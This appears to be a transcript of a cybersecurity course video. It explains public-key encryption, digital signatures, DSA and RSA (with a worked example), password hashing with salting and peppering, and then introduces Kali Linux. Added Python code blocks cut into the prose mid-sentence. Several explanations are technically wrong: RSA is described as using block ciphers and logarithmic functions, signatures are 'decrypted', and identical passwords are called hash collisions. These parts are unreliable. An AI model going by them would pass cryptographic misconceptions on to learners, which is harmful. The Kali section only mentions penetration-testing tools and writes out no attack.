Since this type of encryption is highly secure, it has many uses in areas that require high confidentiality. It is used to manage digital signatures, so there is valid proof of a document’s authenticity. With so many aspects of business transitioning to the digital sphere, critical documents need to be verified before being considered authentic and acted upon. Thanks to asymmetric cryptography, senders can now sign documents with their private keys. Anyone who needs to verify the authenticity of such signatures can use the sender’s public key to decrypt the signature. Since the public and the private keys are linked to each other mathematically, it’s impossible to repeat this verification with duplicate keys. Document encryption has been made very simple by today’s standards, but the background implementation follows a similar approach. In blockchain architecture, asymmetric key cryptography is used to authorize transactions and maintain the system. Thanks to its two-key structure, changes are reflected across the blockchain’s peer-to-peer network only if they are approved from both ends. Along with asymmetric key cryptography’s tamper-proof architecture, its non-repudiation characteristic also helps in keeping the network stable. We can also use asymmetric key cryptography combined with symmetric key cryptography to monitor SSL or TLS encrypted browsing sessions to make sure nobody can steal personal information when accessing banking websites or the internet in general. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys required, and generating a session using those keys to ensure maximum security, instead of the rather insecure HTTP website format. Security parameters differ on a session-by-session basis, so the verification process is consistent and utterly essential to modern data security. Another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography. With the most significant difficulty in symmetric encryption being key exchange, asymmetric keys can help clear the shortcoming. The original message is first encrypted using a symmetric key. The key used for encrypting the data is then converted into cipher text using the receiver’s public key. Now we have two cipher texts to transmit to the receiver. On receiving both of them, the receiver uses his private key to decrypt the symmetric key. He can then use it to decrypt the original information on getting the key used to encrypt the data. While this may seem more complicated than just asymmetric cryptography alone, symmetric encryption algorithms are much more optimized for vast amounts of data. On some occasions, encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure.

You might remember us discussing why symmetric encryption was called private key cryptography. Let us understand why asymmetric falls under public key cryptography. We have two keys at our disposal: the encryption key is available to everyone, and the decryption key is supposed to be private. Unlike symmetric cryptography, there is no need to share anything privately to have an encrypted messaging system. To put that into perspective, we share our email address with anyone looking to communicate with us. It is supposed to be public by design, so that our email login credentials are private and they help in preventing any data mishandling. Since there is nothing hidden from the world if they want to send us any encrypted information, this category is called public key cryptography. There are quite a few algorithms being used today that follow the architecture of asymmetric cryptography, none more famous than RSA encryption. RSA encryption is the most widely used encryption or public key encryption standard using the asymmetric approach. Named after its founders Rivest, Shamir and Adleman, it uses block ciphers to obscure the information. If you are unfamiliar with how block ciphers work, they are encryption algorithms that divide the original data into blocks of equal size. The block size depends on the exact cipher being used. Once they are broken down, these blocks are encrypted individually and later chained together to form the final cipher text. Widely considered to be the most secure form of encryption, albeit relatively slower than symmetric encryption algorithms, it is widely used in web browsing, secure identification, VPNs, emails and other chat applications.

With so many variables in play, there must be some advantages that give asymmetric cryptography an edge over the traditional symmetric encryption methodologies. Let’s go through some of them. There is no need for any reliable key sharing channel in asymmetric encryption. It was an added risk in private key cryptography that has been completely eliminated in the public key architecture. The key which is made public cannot decrypt any confidential information, and the only key that can decrypt doesn’t need to be shared publicly under any circumstance. We have much more extensive key lengths in RSA encryption and other asymmetric algorithms, like 2048-bit and 4096-bit keys. Larger keys are much harder to break into via brute force and are much more secure. Asymmetric key cryptography can be used as a proof of authenticity, since only the rightful owner of the keys can generate the messages to be decrypted by the private key. The situation can also be reversed: encryption is done using a private key and decryption is done by
the public key, which would not function if the correct private key is not used to generate the message, hence proving the authenticity of the owner. It also has a tamper protection feature, where the message cannot be intercepted and changed without invalidating the private key used to encrypt the data. Consequently, the public key cannot decrypt the message, and it is easy to realize the information is not 100% legitimate when and where the case requires.

Now that we have a proper revision, let’s understand what digital signatures are before moving on to the algorithm. The objective of digital signatures is to authenticate and verify documents and data. This is necessary to avoid tampering and digital modification or forgery of any kind during the transmission of official documents. They work on the public key cryptography architecture with one exception: typically, an asymmetric key system encrypts using a public key and decrypts with a private key; for digital signatures, however, the reverse is true. The signature is encrypted using a private key and is decrypted with the public key. Because the keys are linked together, decoding it with the public key verifies that the proper private key was used to sign the document, thereby verifying the signature’s provenance. Let’s go through each step to understand the procedure thoroughly. In step one we have M, which is the original plain text message, and it is passed on to a hash function, denoted by H, to create a digest. Next, it bundles the message together with the hash digest and encrypts it using the sender’s private key. It sends the encrypted bundle to the receiver, who can decrypt it using the sender’s public key. Once the message is decrypted, it is passed through the same hash function, H, to generate a similar digest. It compares the newly generated hash with the bundled hash value received along with the message. If they match, it verifies data integrity. In many instances they provide a layer of validation and security to messages sent through a non-secure channel. Properly implemented, a digital signature gives the receiver reason to believe that the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects, but properly implemented digital signatures are more difficult to forge than the handwritten type. Digital signature schemes, in the sense used here, are cryptographically based and must be implemented properly to be effective. They can also provide non-repudiation, meaning that the signer cannot successfully claim that they did not sign a message while also claiming their private key remains secret. Further, some non-repudiation schemes offer a timestamp for the digital signature, so that even if the private key is exposed, the signature is valid.

To implement the concept of digital signatures in the real world, we have two primary algorithms to follow: the RSA algorithm and the DSA algorithm, but the latter is our topic of learning today. So let’s go ahead and see what the Digital Signature Algorithm is supposed to do. The Digital Signature Algorithm is a FIPS standard, which is a Federal Information Processing Standard, for digital signatures. It was proposed in 1991 and globally standardized in 1994 by the National Institute of Standards and Technology, also known as NIST. It functions on the framework of modular exponentiation and discrete logarithm problems, which are difficult to compute as a brute force system. Unlike DSA, most signature types are generated by signing the message digest with the private key of the originator. This creates a digital thumbprint of the data. Since just the message digest is signed, the signature is generally much smaller compared to the data that was signed. As a result, digital signatures impose less load on processors at the time of signing execution, and they use small volumes of bandwidth. DSA, on the other hand, does not encrypt the message digest using the private key or decrypt the message digest using the public key. Instead, it uses mathematical functions to create a digital signature consisting of two 160-bit numbers, which originate from the message digest and the private key. DSA makes use of the public key for authenticating the signature, but the authorization process is much more complicated when compared with RSA. DSA also provides three benefits, which are message authentication, integrity verification and non-repudiation. In the image we can see the entire process of DSA validation. A plain text message is passed on to a hash function, where the digest is generated, which is passed on to a signing function. The signing function also has other parameters, like a global variable G, a random variable K and the private key of the sender. The outputs are then bundled into a single pack with the plain text and sent to the receiver. The two outputs we receive from the signing function are the two 160-bit numbers denoted by S and R. On the receiver’s end, we pass the plain text through the same hash function to regenerate the message digest. It is passed on to a verification function which has other requirements, such as the public key of the sender, the global variable G, and S and R received from the sender. The value generated by the function is then compared to R. If they match, then the verification process is complete and data integrity is verified. This was an overview of the way the DSA algorithm works. We already know it depends on logarithmic functions to calculate the outputs, so let us see how we can do the same in our next section.

We have three phases here, the first of which is key generation. To generate the keys we need some prerequisites. We select a Q, which becomes a prime divisor. We select a prime number P such that (P - 1) mod Q = 0. We also select a random integer G which must satisfy the two formulas being mentioned on the screen right now. Once these values are selected, we can go ahead with generating the keys. The private key can be denoted by X, and it is any random integer that falls between the bracket of zero and the value of Q. The public key can be calculated as Y = G^X mod P, where Y stands for the public key. The private key can then be packaged as a bundle which comprises the values of P, Q, G and X. Similarly, the public key can also be packaged as a bundle having the values of P, Q, G and Y. Once we’re done with key generation, we can start with generating and verifying the signature. Once the keys are generated, we can start generating the signature. The message is passed through a hash function to generate the digest H first. We can choose any random integer K which falls under the bracket of 0 and Q. To calculate the first 160-bit number of the signing function, R, we use the formula R = (G^K mod P) mod Q. Similarly, to calculate the value of the second output, that is S, we use the following formula that is shown on the screen. The signature can then be packaged as a bundle having R and S. This bundle, along with the plain text message, is then passed on to the receiver. Now, with the third phase, we have to verify the signature. We first calculate the message digest of the message received in the bundle by passing it through the same hash function. We calculate the values of W, U1 and U2 using the formulas shown on the screen. We have to calculate a verification component which is then to be compared with the value of R being sent by the sender. This verification component can be calculated using the following formula. Once calculated, this can be compared with the value of R. If the values match, then the signature verification is successful and our entire process is complete, starting from key generation to the signature generation, all the way up to the verification of the signature.

With so many steps to follow, we are bound to have a few advantages to boot, and we would be right to think so. DSA is highly robust in the security and stability aspect when compared to alternative signature verification algorithms. We have a few other ciphers that aim to achieve the simplicity and the flexibility
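The three DSA phases just described (key generation, signature generation, verification), as an added Python example that is not part of the lesson. The S, W, U1, U2 and V formulas are the standard FIPS 186 ones that the video shows on screen but the transcript does not reproduce; the domain parameters P = 23, Q = 11, G = 4 are constructed toy values so that every number can be checked by hand.

```python
import hashlib
import secrets

# Toy DSA domain parameters, constructed for this example so that every value
# can be checked by hand: Q divides P - 1 (22 = 2 * 11) and G = 4 has order Q
# modulo P. Real DSA uses P of 2048 or 3072 bits and Q of 224 or 256 bits.
P, Q, G = 23, 11, 4


def keygen(x=None):
    """Phase 1: private key X in (0, Q), public key Y = G^X mod P."""
    if x is None:
        x = secrets.randbelow(Q - 1) + 1
    return x, pow(G, x, P)


def digest(message):
    """Message digest H as an integer (reduced mod Q inside sign/verify)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign_digest(x, h, k):
    """Phase 2 for a given nonce K: R = (G^K mod P) mod Q, S = K^-1 (H + X R) mod Q."""
    r = pow(G, k, P) % Q
    s = (pow(k, -1, Q) * (h + x * r)) % Q
    if r == 0 or s == 0:
        raise ValueError("degenerate nonce; choose another K")
    return r, s


def sign(x, message):
    """Sign with a fresh random K each time (reusing K across messages leaks X)."""
    h = digest(message)
    while True:
        k = secrets.randbelow(Q - 1) + 1
        try:
            return sign_digest(x, h, k)
        except ValueError:
            continue


def verify_digest(y, h, signature):
    """Phase 3: W = S^-1 mod Q, U1 = H W mod Q, U2 = R W mod Q,
    V = ((G^U1 * Y^U2) mod P) mod Q; the signature is valid iff V == R."""
    r, s = signature
    if not (0 < r < Q and 0 < s < Q):
        return False
    w = pow(s, -1, Q)
    u1 = (h * w) % Q
    u2 = (r * w) % Q
    v = ((pow(G, u1, P) * pow(y, u2, P)) % P) % Q
    return v == r


def verify(y, message, signature):
    """Hash the received plain text with the same function, then run phase 3."""
    return verify_digest(y, digest(message), signature)


if __name__ == "__main__":
    x, y = keygen(7)                       # Y = 4^7 mod 23 = 8
    r, s = sign_digest(x, h=5, k=3)        # (7, 7)
    print(verify_digest(y, 5, (r, s)))     # True
    print(verify_digest(y, 6, (r, s)))     # False: a different digest fails to verify
    msg = b"Call me today."
    print(verify(y, msg, sign(x, msg)))    # True
```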
of DSA, but it has been a tough ask for all the other suites. The key generation is much faster when compared to the RSA algorithm and such; while the actual encryption and decryption process may falter a little in comparison, a quicker start in the beginning is well known to optimize a lot of frameworks. DSA requires less storage space to work its entire cycle. In contrast, its direct correspondent, that is the RSA algorithm, needs a certain amount of computational and storage space to function efficiently. This is not the case with DSA, which has been optimized to work with weaker hardware and fewer resources. The DSA is patented, but NIST has made this patent available worldwide royalty-free. A draft version of the specification FIPS 186-5 indicates that DSA will no longer be approved for digital signature generation, but it may be used to verify signatures generated prior to the implementation date of that standard.

The RSA algorithm is a public key signature algorithm developed by Ron Rivest, Adi Shamir and Leonard Adleman. The paper was first published in 1977, and the algorithm uses logarithmic functions to keep the working complex enough to withstand brute force and streamlined enough to be fast post-deployment. RSA can also encrypt and decrypt general information to securely exchange data, along with handling digital signature verification. Let us understand how it achieves this. We take our plain text message M. We pass it through a hash function to generate the digest h, which is then encrypted using the sender’s private key. This is appended to the original plain text message and sent over to the receiver. Once the receiver receives the bundle, we can pass the plain text message through the same hash function to generate a digest, and the cipher text can be decrypted using the public key of the sender. The remaining hashes are compared; if the values match, then the data integrity is verified and the sender is authenticated. Apart from digital signatures, the main use case of RSA is encryption and decryption of private information before being transmitted across communication channels. This is where the data encryption comes into play. When using RSA for encryption and decryption of general data, it reverses the key set usage: unlike signature verification, it uses the receiver’s public key to encrypt the data and uses the receiver’s private key in decrypting the data. Thus there is no need to exchange any keys in this scenario. There are two broad components when it comes to RSA cryptography. One of them is key generation. Key generation employs the steps of generating the private and the public keys that are going to be used for encrypting and decrypting the data. The second part is the encryption and decryption functions. These are the ciphers and steps that need to be run when scrambling the data or recovering the data from the cipher text. You will now understand each of these steps in our next subtopic.

Keeping the previous two concepts in mind, let us go ahead and see how the entire process works, starting from creating the key pair to encrypting and decrypting the information. You need to generate the public and private keys before running the functions to generate cipher text and plain text. They use certain variables and parameters, all of which are explained. We first use two large prime numbers, which can be denoted by p and q. We can compute the value of n as n = p × q and compute the value of z as (p - 1) × (q - 1). A number E is chosen at random satisfying the following conditions, and a number D is also selected at random following the formula E × D mod Z = 1, and it can be calculated with the formula given below. The public key is then packaged as a bundle with N and E, and the private key is packaged as a bundle using N and D. This sums up the key generation process. For the encryption and decryption functions, we use the formulas for C and M: the cipher text can be calculated as C = M^E mod N, and the plain text can be calculated from the cipher text as C^D mod N. When it comes to a data encryption example, let’s take p and q as 7 and 13. The value of N can be calculated as 91. If we select the value of E to be 5, it satisfies all the criteria that we needed. The value of D can be calculated using the following function, which gives it as 29. The public key can then be packaged as (91, 5) and the private key can then be packaged as (91, 29). If the plain text, which is denoted by M, is 10, the cipher text can be calculated with the formula C = M^E mod N, which gives us 82. If somebody receives this cipher text, they can calculate the plain text using the formula C^D mod N, which gives us the value of 10, as selected as our plain text.

We can now look at the factors that make the RSA algorithm stand out versus its competitors in the advantages topic of this lesson. RSA encryption depends on using the receiver’s public key, so that you don’t have to share any secret key to receive messages from others. This was the most glaring flaw faced by symmetric algorithms, which was eventually fixed by the asymmetric cryptography structure. Since the key pairs are related to each other, a receiver cannot intercept the message, since they don’t have the correct private keys to decrypt the information. If a public key can decrypt the information, the sender cannot refuse signing it with his private key without admitting the private key is not in fact private anymore. The encryption process is faster than that of the DSA algorithm, even if the key generation is slower in RSA. Many systems across the world tend to reuse the same keys so that they can spend less time in key generation and more time on actual cipher text management. Data will be tamper-proof in transit, since meddling with the data will alter the usage of the keys; the private key won’t be able to decrypt the information, hence alerting the receiver of any kind of manipulation in between. The receiver must be aware of any third party who possesses the private key, since they can alter
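The RSA key generation, encryption, decryption and hash-then-sign steps above, as an added Python example that is not part of the lesson. It reproduces the p = 7, q = 13, E = 5 worked example (N = 91, D = 29, 10 encrypts to 82) and also generates a realistic-size key pair with a Miller-Rabin primality test, which the lesson does not show; no padding scheme is applied, so this is textbook RSA for study only.

```python
import hashlib
import secrets
from math import gcd


def is_probable_prime(n, rounds=32):
    """Miller-Rabin primality test (probabilistic; added helper, not from the lesson)."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    """Random prime of exactly `bits` bits (top and bottom bits forced to 1)."""
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def rsa_key_from_primes(p, q, e):
    """N = p*q, Z = (p-1)(q-1), D = E^-1 mod Z; returns ((N, E), (N, D))."""
    n = p * q
    z = (p - 1) * (q - 1)
    if gcd(e, z) != 1:
        raise ValueError("E must be coprime to (p-1)(q-1)")
    d = pow(e, -1, z)  # modular inverse, so E * D mod Z == 1 (Python 3.8+)
    return (n, e), (n, d)


def rsa_keygen(bits=1024, e=65537):
    """Fresh key pair from two random primes of bits/2 each."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        if p != q and gcd(e, (p - 1) * (q - 1)) == 1:
            return rsa_key_from_primes(p, q, e)


def encrypt(m, public_key):
    """C = M^E mod N with the receiver's public key."""
    n, e = public_key
    return pow(m, e, n)


def decrypt(c, private_key):
    """M = C^D mod N with the receiver's private key."""
    n, d = private_key
    return pow(c, d, n)


def digest(message):
    """SHA-256 digest of the message as an integer."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(message, private_key):
    """Signature = digest^D mod N with the sender's private key (digest reduced mod N for toy keys)."""
    n, d = private_key
    return pow(digest(message) % n, d, n)


def verify(message, signature, public_key):
    """Recover the digest with the sender's public key and compare with a fresh hash."""
    n, e = public_key
    return pow(signature, e, n) == digest(message) % n


if __name__ == "__main__":
    # The lesson's worked example: p = 7, q = 13, E = 5 -> N = 91, D = 29.
    pub, priv = rsa_key_from_primes(7, 13, 5)
    c = encrypt(10, pub)                     # 82
    print(pub, priv, c, decrypt(c, priv))    # ((91, 5), (91, 29), 82, 10)
    # A realistic-size key for signing; the 256-bit digest is then smaller than N.
    pub, priv = rsa_keygen()
    sig = sign(b"Call me today.", priv)
    print(verify(b"Call me today.", sig, pub), verify(b"Call me tomorrow.", sig, pub))
```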
the data mid-transit, the cases of which are rather low.

Imagine creating an account on a new website. You provide your email address and set a password that you are confident you would not forget. What about the website owner? How securely are they going to store your password? Website administrators have three alternatives: they can either store the passwords in a plain text format, they can encrypt the passwords using an encryption and decryption key, or they can store the passwords as a hash value. Let’s have a look at each of these. When a password is stored in plain text format, it is considered to be the most unsafe option, since anyone in the company can read your passwords. A single hack and a data server breach will expose all the accounts’ credentials without needing any extra effort. To counter this, owners can encrypt the passwords and keep them in the servers as a second alternative, but that would mean they also have to store the decryption key somewhere on their servers. In the event of a data breach or a server hack, both the decryption key and the encrypted passwords would be leaked, thus making it a single point of failure. What if there was an option to store the passwords after scrambling them completely, but with no way to decrypt them? This is where hashing comes into play. Since only the hashed values are stored on the server, no encryption is needed. With no plain text passwords to protect, your credentials are safe from the website administrators. Considering all the pros, hashed passwords are the industry standard when it comes to storing credentials nowadays.

Before getting too deep into the topic, let’s get a brief overview of how hashing works. Hashing is the process of scrambling a piece of information or data beyond recognition. We can achieve this by using hash functions, which are essentially algorithms that perform mathematical operations on the main plain text. The value generated after passing the plain text information through the hash function is called the hash value, digest, or in general just the hash of the original data. While this may sound similar to encryption, the major difference is that hashes are made to be irreversible: no decryption key can convert a digest back to its original value. However, a few hashing algorithms have been broken due to the increase in computational complexity of today’s new generation of computers and processors. There are new algorithms that stand the test of time and are still in use in multiple areas, for password storage, identity verification, etc. Like we discussed earlier, websites use hashing to store the users’ passwords. So how do they make use of these hashed passwords? When a user signs up to create a new account, the password is run through the hash function and the resulting hash value is stored on the servers. So the next time a user comes to log in to the account, the password he enters is passed through the same hash function and compared to the hash stored on the main server. If the newly calculated hash is the same as the one stored on the website server, the password must have been correct, because according to hash function terminology, the same inputs will always provide the same outputs. If the hashes do not match, then the password entered during login is not the same as the password entered during signup, hence the login will be denied. This way, no plain text passwords get stored, preventing the owner from snooping on user data and protecting users’ privacy in the unfortunate event of a data breach or a hack. Apart from password storage, hashing can also be used to perform integrity checks. When a file is uploaded on the internet, the file’s hash value is generated and it is uploaded along with the original information. When a new user downloads the file, he can calculate the digest of the downloaded file using the same hash function. When the hash values are compared, if they match, then file integrity has been maintained and there has been no data corruption.

Since so much important information is being passed on to the hash function, we need to understand how they work. A hash function is a set of mathematical calculations operated on two blocks of data. The main input is broken down into two blocks of similar size. The block size is dependent on the algorithm that is being used. Hash functions are designed to be one-way; they shouldn’t be reversible, at least by design. Some algorithms, like the previously mentioned MD5, have been compromised, but most secure algorithms are being used today, like the SHA family of algorithms. The digest size is also dependent on the respective algorithm being used: MD5 has a digest of 128 bits, while SHA-256 has a digest of 256 bits. This digest must always be the same for the same input, irrespective of how many times the calculations are carried out. This is a very crucial feature, since comparing the hash value is the only way to check if the data is untouched, as the functions are not reversible. There are certain requirements of a hash function that need to be met before they are accepted. While some of them are easy to guess, others are placed in order to preserve security in the long run. The hash function must be quick enough to encrypt large amounts of data at a relatively fast pace, but it also shouldn’t be very fast. Running the algorithm on all cylinders makes the functions easy to brute force and a security liability. There must be a balance to allow the hash function to handle large amounts of data and not make it ridiculously easy to brute force by running through all the possible combinations. The hash function must be dependent on each bit of the input. The input can be text, audio, video or any other file extension. If a single character is being changed, it doesn’t matter how small that character may be, the entire digest must have a distinctly different hash value. This is essential to create unique digests for every password that is being stored. But what if two different users are using the same password? Since the hash function is the same for all users, both the digests will be the same. This is called a hash collision. You may think this must be a rare occasion where two users have exactly the same password, but that is not the case. We have techniques like salting that can be used to reduce these hash collisions, as we will discuss later in this video. You would be shocked to see the most used passwords of 2020. All of these passwords are laughably insecure, and since many people use the same passwords repeatedly on different websites, hash collision risks are more common than one would expect. Let’s say the hash functions find two users having the same password. How can they store both the hashes without messing up the original data? This is where salting and peppering come into play. Salting is the process of adding a random keyword to the end of the input before it is passed on to the hash function. This random keyword is unique for each user on the system, and it is called the salt value, or just the salt. So even if two passwords are exactly the same, the salt value will differ, and so will their digests. There is a small problem with this process though: since the salt is unique for each user, they need to be stored in the database along with the passwords, and sometimes even in plain text, to speed up the process of continuous verification. If the server is hacked, then the hashes will need to be brute forced, which takes a lot of time, but if they receive the salts as well, the entire process becomes very fast. This is something that peppering aims to solve. Peppering is the process of adding a random string of data to the input before passing it through the hash function, but this time the random string is not unique for each user; it is supposed to be common for all users in the database, and the extra bit added is called the pepper. In this case, the pepper isn’t stored on the servers; it is mostly hardcoded into the website source code, since it’s going to be the same for all credentials. This way, even if
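The password storage scheme just described (per-user salt stored beside the hash, site-wide pepper kept out of the database, a hash that is deliberately not fast), as an added Python example that is not part of the lesson. It uses PBKDF2-HMAC-SHA256 from the standard library; the pepper value and the two user accounts are constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Site-wide pepper: kept in the application code or config, never in the
# database next to the hashes. Constructed value for this example only.
PEPPER = b"example-pepper-value"
# PBKDF2 is deliberately slow; the iteration count is the "not too fast"
# requirement the lesson describes, so brute forcing leaked hashes is costly.
ITERATIONS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> dict:
    """Return the stored record {salt, digest}; a fresh random salt per user."""
    if salt is None:
        salt = os.urandom(16)  # unique per user, stored beside the digest
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode() + PEPPER, salt, ITERATIONS)
    return {"salt": salt, "digest": digest}


def verify_password(password: str, record: dict) -> bool:
    """Recompute with the stored salt and the site pepper, then compare."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode() + PEPPER, record["salt"], ITERATIONS)
    # constant-time comparison so timing does not reveal matching prefixes
    return hmac.compare_digest(candidate, record["digest"])


def register_users(credentials: dict) -> dict:
    """Constructed user table: username -> stored record (no plain text kept)."""
    return {user: hash_password(pw) for user, pw in credentials.items()}


if __name__ == "__main__":
    # Two users with the same weak password get different digests thanks to the salt.
    table = register_users({"alice": "123456", "bob": "123456"})
    print(table["alice"]["digest"].hex()[:16], table["bob"]["digest"].hex()[:16])
    print(verify_password("123456", table["alice"]),
          verify_password("password", table["alice"]))  # True False
```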
the servers get hacked they will not have the right pepper needed to crack into all the passwords many websites use a combination of salting and peppering to solve the problem of hash collision and bolster security since brute force takes such a long time many hackers avoid taking the effort the returns are mostly not worth it and the possible combinations of using both salting and peppering is humongous with cyber crime getting more and more complex by the day corporations are in the need of trained personnel in the field of cyber security ethical hacking and penetration testing had always been necessary for organizations and the general public to protect the system against malicious attackers however with the exponential growth in cyber attacks the necessity of being trained in ethical hacking is at an all-time high many such professionals tend to use Linux distributions for their penetration testing activities there are specific operating systems which are catered to ethical hackers these operating systems come pre-installed with the necessary tools and scripts required for ethical hacking probably the most famous operating system in this bracket is Kala Linux for today’s video we will learn about this distribution made by and for hackers we take you through the intricacies of its hardware and software specifications let’s take a look at the agenda for today we start by learning about Kali Linux and a basic explanation of its purpose we take a look at the history of Kali Linux from the story of its origin to its current day exploits next we learn a few distinct features of Kal Linux that make it an attractive choice for penetration testers worldwide moving on we take a look at the multiple ways we can install Kal Linux to start our journey in the world of penetration testing in the next few sections we compare it to an industry rival operating system by the name of Parrot Security operating system we take a look at the OS on a grassroots level next we learn 
about the standout features of Kali Linux and Parrot Security with their unique offerings. We make a direct comparison between Kali and Parrot Security OS as far as their hardware specifications and all-round usability are concerned, and we come to a conclusion as to which operating system caters to which category of user. In the next topic we take a detailed look at how we can install Kali Linux on a Windows 10 system using the VMware virtualization software. Moving on, we go through some of the reasons why people should choose Kali Linux as their primary operating system when it comes to ethical hacking and penetration testing. In the next

section we cover the five different phases of penetration testing, where each stage is a crucial segment in the entire cycle of an ethical hacking campaign. We also take a look at the most popular tools installed in Kali Linux that are used regularly by ethical hackers as a part of their professional work. Coming to a few live demonstrations, we start by learning some basic Linux terminal commands, set up proxychains to maintain our privacy on the internet, run a few Nmap scans to find information about our victims, use Wireshark to detect insecure browser traffic traveling through HTTP web pages, learn about Metasploit and its components, and finally use Metasploit to hack into a Windows 10 machine and grant ourselves root access, or admin access, which basically gives us the key to the entire machine.

It’s no secret that the majority of our internet usage is at the risk of being hacked, be it via unsafe messaging applications or misconfigured operating systems. To counteract this void of digital security, penetration testing has become the norm when it comes to vulnerability assessment. Kali Linux is an operating system that has become a well-known weapon in this fight against hackers. A Linux distribution that is made specifically for penetration testers, Kali Linux has layers of features that we will be covering in today’s lesson.

Let’s take a look at the topics to be covered in this video. We start by learning about Kali Linux and a basic explanation of its purpose. We take a look at the history of Kali Linux, from the story of its origin to its current day exploits. Next we learn a few distinct features of Kali that make it an attractive choice for penetration testers worldwide. Finally, we take a look at the multiple ways we can install Kali Linux to start our journey in the world of penetration testing.

Let’s start by learning about Kali Linux in general. Kali Linux, which was formerly known as BackTrack Linux, is an open-source Linux distribution aimed at advanced penetration
testing and security auditing. It contains several hundred tools that are targeted towards various information security tasks, such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali desktop. While the operating system is capable of practically modifying every single part of our installation, the networking components of Kali are disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a deeper element of control to the most enthusiastic of users.

We did not get Kali Linux since the first day, so how did it come into existence? Let’s take a look at some of its history. Kali Linux is based on years of knowledge and experience in building penetration testing operating systems. During all these project lifelines there have been only a few different developers, as the team has always been small. The first project was called WHoppiX, which stands for White Hat Knoppix; as can be inferred from the name, it was based on the Knoppix operating system as its underlying OS. WHoppiX had releases ranging from version 2.0 to 2.7. This made way for the next project, which was known as WHAX, the long hand being White Hat Slax. The name change was because the base OS was changed from Knoppix to Slax. WHAX started at version 3, as a nod to it carrying on from WHoppiX. There was a similar OS being produced at the same time, Auditor Security Collection, often being shortened to just Auditor, which was once again using Knoppix. Its efforts were combined with WHAX to produce BackTrack. BackTrack was based on Slackware from
version 1 to version 3 but switched to Ubuntu later on, with version 4 to version 5. Using the experience gained from all of this, Kali Linux came after BackTrack in 2013. Kali started off using Debian stable as the engine under the hood before moving to Debian testing, when Kali Linux became a rolling operating system.

Now that we understand the history and the purpose of Kali Linux, let us learn a little more about its distinct features. The latest version of Kali comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in BackTrack, developers have eliminated a great number of tools that either simply did not work or duplicated other tools that provided the same or similar functionality. The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access of critical code bases to external assets greatly reduces the risk of source contamination, which could cause Kali Linux users worldwide a great deal of damage as direct victims of cyber crime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. The more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a stronghold over the configuration and the device in general. Since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali’s ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so the tools for ARM are updated in conjunction with the rest of the distribution. All
this information is necessary for users to determine if Kali Linux is the correct choice for them. If it is, what are the ways that they can go forward with this installation and start their penetration testing journey?

The first way to use Kali Linux is by launching the distribution in live USB mode. This can be achieved by downloading the installer image file, or the ISO file, from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB. Some people don’t need to save the data permanently, and a live USB is the perfect solution for such cases. After the ISO image is flashed, the thumb drive can be used to boot a fully working installation of the operating system, with the caveat that any changes made to the OS in this mode are not written permanently. Some cases allow persistent usage in live USBs, but those require further configuration than normal situations.

But what if the user wants to store data permanently in the installed OS? The best and the most reliable way to ensure this is the full-fledged hard disk installation. This will ensure the complete usage of the system’s hardware capabilities and will take into account the updates and the configurations being made to the OS. This method is supposed to override any pre-existing operating system installed on the computer, be it Windows or any other variant of Linux.

The next alternative route for installing Kali Linux would be to use virtualization software such as VMware or VirtualBox. The software will be installed as a separate application on an already existing OS, and Kali Linux can be run as an operating system in the same computer as a window. The hardware requirements will be completely customizable, starting with the allotted RAM to the virtual hard disk capacity. The usage of both a host and a guest operating system like Kali Linux allows users a safe environment to learn while not putting their systems at risk. If you want to learn more about how one can go forward with this method, we have a
dedicated video where Kali Linux is being installed on VMware while running on a Windows 10 operating system; you can find the link in the description box to get started with your very own virtual machine.

The final way to install Kali Linux is by using a dual boot system. To put it in simple words, the Kali Linux OS will not be overwriting any pre-installed operating system on a machine but will be installed alongside it. When the computer boots up, the user will get a choice to boot into either of these operating systems. Many people prefer to keep both Windows and Kali Linux installed so that the distribution of work and recreational activities is also allotted effectively. It gives users a safety valve should their custom Linux installation run into any bugs that cannot be fixed from within the operating system.

Professionals in security testing, penetration testing and ethical hacking utilize Linux as their preferred operating system. It provides several configurable distributions that you may configure based on your end use. Kali Linux and Parrot OS are two popular penetration testing distributions. While these operating systems each have unique offerings, the overall choice can differ between personnel thanks to their various tools and hardware specifications. Today we will look at both these distributions and settle on the perfect choice for each type of user.

